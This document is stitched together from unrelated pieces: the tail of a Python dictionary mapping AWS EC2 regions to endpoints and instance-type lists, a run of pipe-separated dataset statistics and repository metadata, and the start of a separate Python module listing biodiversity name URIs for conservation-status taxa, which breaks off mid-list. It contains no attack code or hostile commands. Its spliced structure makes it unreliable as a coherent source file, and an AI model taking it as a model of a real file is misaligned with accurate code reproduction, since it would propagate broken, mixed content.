"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2gd.12xlarge",
"x2gd.16xlarge",
"x2gd.2xlarge",
"x2gd.4xlarge",
"x2gd.8xlarge",
"x2gd.large",
"x2gd.medium",
"x2gd.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"us-gov-west-1": {
"api_name": "ec2_us_govwest",
"country": "US",
"endpoint": "ec2.us-gov-west-1.amazonaws.com",
"id": "us-gov-west-1",
"instance_types": [],
"signature_version": "2",
},
"us-west-1": {
"api_name": "ec2_us_west",
"country": "USA",
"endpoint": "ec2.us-west-1.amazonaws.com",
"id": "us-west-1",
"instance_types": [
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"us-west-2": {
"api_name": "ec2_us_west_oregon",
"country": "US",
"endpoint": "ec2.us-west-2.amazonaws.com",
"id": "us-west-2",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"cc2.8xlarge",
"cr1.8xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"d3en.12xlarge",
"d3en.2xlarge",
"d3en.4xlarge",
"d3en.6xlarge",
"d3en.8xlarge",
"d3en.xlarge",
"dl1.24xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5.12xlarge",
"g5.16xlarge",
"g5.24xlarge",
"g5.2xlarge",
"g5.48xlarge",
"g5.4xlarge",
"g5.8xlarge",
"g5.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"h1.16xlarge",
"h1.2xlarge",
"h1.4xlarge",
"h1.8xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"i4i.16xlarge",
"i4i.2xlarge",
"i4i.32xlarge",
"i4i.4xlarge",
"i4i.8xlarge",
"i4i.large",
"i4i.xlarge",
"im4gn.16xlarge",
"im4gn.2xlarge",
"im4gn.4xlarge",
"im4gn.8xlarge",
"im4gn.large",
"im4gn.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"is4gen.2xlarge",
"is4gen.4xlarge",
"is4gen.8xlarge",
"is4gen.large",
"is4gen.medium",
"is4gen.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p3dn.24xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"vt1.24xlarge",
"vt1.3xlarge",
"vt1.6xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2gd.12xlarge",
"x2gd.16xlarge",
"x2gd.2xlarge",
"x2gd.4xlarge",
"x2gd.8xlarge",
"x2gd.large",
"x2gd.medium",
"x2gd.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"x2iezn.12xlarge",
"x2iezn.2xlarge",
"x2iezn.4xlarge",
"x2iezn.6xlarge",
"x2iezn.8xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
}
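The mapping above keys each EC2 region id to its API endpoint, signature version, and the list of instance types offered there. As a minimal sketch of how such a mapping might be queried — assuming the dict is bound to a name like REGION_DETAILS; the name and the helper below are illustrative, not part of the source file:

def region_supports(region_details, region_id, instance_type):
    """Return True if the given region lists the instance type."""
    region = region_details.get(region_id)
    return bool(region) and instance_type in region["instance_types"]

# e.g. region_supports(REGION_DETAILS, "us-east-2", "m6i.large")      -> True
# e.g. region_supports(REGION_DETAILS, "us-gov-west-1", "m6i.large")  -> False (empty list)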
| 26.934988
| 77
| 0.372179
| 12,437
| 162,822
| 4.862507
| 0.019699
| 0.004365
| 0.003803
| 0.005953
| 0.976569
| 0.960926
| 0.954874
| 0.954411
| 0.954411
| 0.953601
| 0
| 0.135892
| 0.476956
| 162,822
| 6,044
| 78
| 26.939444
| 0.574217
| 0.005085
| 0
| 0.978766
| 1
| 0
| 0.407438
| 0.004285
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 6f589cf6d6ba464e0009c3d2f0808580c6eb2cb5
| 31,570
| py
| Python
| client/model/types_conservation_status_taxa.py
| surroundaustralia/ndesgateway-testclient
| fe6aa6ed7bc2e3664edde16ce4f82fdf8b3b47f2
| ["BSD-3-Clause"] | 1
| 2022-03-08T02:32:20.000Z
| 2022-03-08T02:32:20.000Z
| client/model/types_conservation_status_taxa.py
| surroundaustralia/ndesgateway-testclient
| fe6aa6ed7bc2e3664edde16ce4f82fdf8b3b47f2
| ["BSD-3-Clause"] | 2
| 2022-03-16T06:40:48.000Z
| 2022-03-17T00:08:05.000Z
| client/model/types_conservation_status_taxa.py
| surroundaustralia/ndesgateway-testclient
| fe6aa6ed7bc2e3664edde16ce4f82fdf8b3b47f2
| ["BSD-3-Clause"] | 1
| 2022-03-09T23:10:39.000Z
| 2022-03-09T23:10:39.000Z
|
# from https://linked.data.gov.au/dataset/bdr/conservation-status-taxa-wa
# in the sop_recipe_abis_model datagraphs
CONSERVATION_STATUS_TAXA = [
"https://test-idafd.biodiversity.org.au/name/afd/70162908",
"https://test-idafd.biodiversity.org.au/name/afd/70162916",
"https://test-idafd.biodiversity.org.au/name/afd/70164586",
"https://test-idafd.biodiversity.org.au/name/afd/70165201",
"https://test-idafd.biodiversity.org.au/name/afd/70165203",
"https://test-idafd.biodiversity.org.au/name/afd/70167551",
"https://test-idafd.biodiversity.org.au/name/afd/70167566",
"https://test-idafd.biodiversity.org.au/name/afd/70167571",
"https://test-idafd.biodiversity.org.au/name/afd/70168226",
"https://test-idafd.biodiversity.org.au/name/afd/70171645",
"https://test-idafd.biodiversity.org.au/name/afd/70174584",
"https://test-idafd.biodiversity.org.au/name/afd/70174588",
"https://test-idafd.biodiversity.org.au/name/afd/70174589",
"https://test-idafd.biodiversity.org.au/name/afd/70174590",
"https://test-idafd.biodiversity.org.au/name/afd/70174591",
"https://test-idafd.biodiversity.org.au/name/afd/70174593",
"https://test-idafd.biodiversity.org.au/name/afd/70174596",
"https://test-idafd.biodiversity.org.au/name/afd/70174597",
"https://test-idafd.biodiversity.org.au/name/afd/70174598",
"https://test-idafd.biodiversity.org.au/name/afd/70174599",
"https://test-idafd.biodiversity.org.au/name/afd/70174601",
"https://test-idafd.biodiversity.org.au/name/afd/70174604",
"https://test-idafd.biodiversity.org.au/name/afd/70174605",
"https://test-idafd.biodiversity.org.au/name/afd/70174608",
"https://test-idafd.biodiversity.org.au/name/afd/70174611",
"https://test-idafd.biodiversity.org.au/name/afd/70174612",
"https://test-idafd.biodiversity.org.au/name/afd/70175999",
"https://test-idafd.biodiversity.org.au/name/afd/70176189",
"https://test-idafd.biodiversity.org.au/name/afd/70176351",
"https://test-idafd.biodiversity.org.au/name/afd/70176993",
"https://test-idafd.biodiversity.org.au/name/afd/70177704",
"https://test-idafd.biodiversity.org.au/name/afd/70177902",
"https://test-idafd.biodiversity.org.au/name/afd/70177903",
"https://test-idafd.biodiversity.org.au/name/afd/70179310",
"https://test-idafd.biodiversity.org.au/name/afd/70179311",
"https://test-idafd.biodiversity.org.au/name/afd/70179312",
"https://test-idafd.biodiversity.org.au/name/afd/70179313",
"https://test-idafd.biodiversity.org.au/name/afd/70179314",
"https://test-idafd.biodiversity.org.au/name/afd/70179315",
"https://test-idafd.biodiversity.org.au/name/afd/70179345",
"https://test-idafd.biodiversity.org.au/name/afd/70180670",
"https://test-idafd.biodiversity.org.au/name/afd/70180673",
"https://test-idafd.biodiversity.org.au/name/afd/70180674",
"https://test-idafd.biodiversity.org.au/name/afd/70180678",
"https://test-idafd.biodiversity.org.au/name/afd/70180682",
"https://test-idafd.biodiversity.org.au/name/afd/70181348",
"https://test-idafd.biodiversity.org.au/name/afd/70181350",
"https://test-idafd.biodiversity.org.au/name/afd/70181355",
"https://test-idafd.biodiversity.org.au/name/afd/70181379",
"https://test-idafd.biodiversity.org.au/name/afd/70181382",
"https://test-idafd.biodiversity.org.au/name/afd/70182008",
"https://test-idafd.biodiversity.org.au/name/afd/70182161",
"https://test-idafd.biodiversity.org.au/name/afd/70182790",
"https://test-idafd.biodiversity.org.au/name/afd/70182791",
"https://test-idafd.biodiversity.org.au/name/afd/70182814",
"https://test-idafd.biodiversity.org.au/name/afd/70183770",
"https://test-idafd.biodiversity.org.au/name/afd/70184890",
"https://test-idafd.biodiversity.org.au/name/afd/70185407",
"https://test-idafd.biodiversity.org.au/name/afd/70188407",
"https://test-idafd.biodiversity.org.au/name/afd/70188409",
"https://test-idafd.biodiversity.org.au/name/afd/70188412",
"https://test-idafd.biodiversity.org.au/name/afd/70188414",
"https://test-idafd.biodiversity.org.au/name/afd/70188418",
"https://test-idafd.biodiversity.org.au/name/afd/70195524",
"https://test-idafd.biodiversity.org.au/name/afd/70195525",
"https://test-idafd.biodiversity.org.au/name/afd/70195863",
"https://test-idafd.biodiversity.org.au/name/afd/70195981",
"https://test-idafd.biodiversity.org.au/name/afd/70195982",
"https://test-idafd.biodiversity.org.au/name/afd/70195984",
"https://test-idafd.biodiversity.org.au/name/afd/70195985",
"https://test-idafd.biodiversity.org.au/name/afd/70195987",
"https://test-idafd.biodiversity.org.au/name/afd/70195988",
"https://test-idafd.biodiversity.org.au/name/afd/70195989",
"https://test-idafd.biodiversity.org.au/name/afd/70195990",
